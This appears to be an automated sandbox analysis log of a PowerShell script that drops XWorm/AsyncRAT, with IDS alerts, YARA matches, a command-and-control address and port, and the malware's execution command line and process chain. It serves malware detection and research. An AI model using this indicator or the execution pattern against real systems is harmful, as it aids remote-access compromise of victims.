      Source: Binary string: \??\C:\Windows\mscorlib.pdb@ source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: mscorlib.pdbH source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.6:49739
      Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.6:49739
      Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49739 -> 92.255.57.155:4411
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: 92.255.57.155
      Source: global trafficTCP traffic: 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2410805237.000001FF7F6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co(
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF0227D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
      Source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341C40FA0_2_00007FFD341C40FA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341CA9A90_2_00007FFD341CA9A9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341CA9E90_2_00007FFD341CA9E9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34290FA40_2_00007FFD34290FA4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015281404_2_01528140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015261484_2_01526148
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015240144_2_01524014
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152E0A04_2_0152E0A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F2884_2_0152F288
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152642C4_2_0152642C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152C7D84_2_0152C7D8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015276004_2_01527600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015278304_2_01527830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152E8A84_2_0152E8A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FB034_2_0152FB03
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01527A184_2_01527A18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01526A284_2_01526A28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152BF084_2_0152BF08
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01520F884_2_01520F88
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01526E284_2_01526E28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015251504_2_01525150
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152813E4_2_0152813E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152613C4_2_0152613C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152E0914_2_0152E091
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015262674_2_01526267
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015242E04_2_015242E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015242E84_2_015242E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015255504_2_01525550
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015255404_2_01525540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015275F04_2_015275F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015235B04_2_015235B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015235A04_2_015235A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F7504_2_0152F750
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F7414_2_0152F741
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015236D04_2_015236D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015266A04_2_015266A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152E86F4_2_0152E86F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01522B504_2_01522B50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01522B404_2_01522B40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152BBC04_2_0152BBC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01526A184_2_01526A18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01524DA84_2_01524DA8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01520F004_2_01520F00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01526E184_2_01526E18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B795F24_2_05B795F2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B706D04_2_05B706D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B770E04_2_05B770E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B72E304_2_05B72E30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B709104_2_05B70910
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B728084_2_05B72808
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B785E84_2_05B785E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B706C04_2_05B706C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B781FB4_2_05B781FB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B782B74_2_05B782B7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B782224_2_05B78222
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B782774_2_05B78277
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B709C64_2_05B709C6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B77BFF4_2_05B77BFF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B77B574_2_05B77B57
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360
      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
      Source: classification engineClassification label: mal100.troj.evad.winPS1@9/13@0/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess64
      Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmc0542d.bhs.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: NLXwvLjXPh.ps1ReversingLabs: Detection: 15%
      Source: NLXwvLjXPh.ps1Virustotal: Detection: 11%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: HP$o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2389124323.000001FF028D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: @0o.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Configuration.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrn, source: RegSvcs.exe, 00000004.00000002.3885856490.00000000058B4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbws source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb&G source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
